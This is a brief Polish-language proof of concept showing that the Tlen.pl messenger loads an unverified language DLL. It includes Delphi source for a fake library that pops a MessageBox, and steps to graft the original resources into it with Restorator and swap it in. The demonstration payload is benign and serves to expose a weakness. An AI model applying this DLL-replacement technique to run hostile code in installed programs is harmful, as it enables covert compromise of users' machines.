Niezabezpieczone biblioteki zasobów na przykładzie Tlena autor:  astRX


Wykonanie dowolnego kodu w aplikacji przez niezabezpieczoną biblioteke zasobów:
1. Cel:
...\Tlen.pl\languages\polish.dll

2. Dołączany kod: tworzymy dowolną bibliotekę

library fakepolish;
uses
Windows, Messages, SysUtils, Graphics, Controls, Dialogs;

{$R *.res}

begin
MessageBox(0, 'greetings from tlen', 'greetings from tlen', 0);
end.

3. Modyfikacja (Restorator): wrzucamy oryginalną polish.dll oraz naszą fakepolish.dll po czym zasoby z oryginalnej (katalog String) wrzucamy do fakepolish.dll ...


... zamykamy oryginalną i zapisujemy fakepolish.dll

Teraz juz tylko zamiana nazwy naszej fakepolish na polish i podmiana w programie. Prymitywne jak siekierka jaskiniowca lecz cóż, program niezabezpieczony...
Testowano na wersji 6.0.1.13


All rights reserved.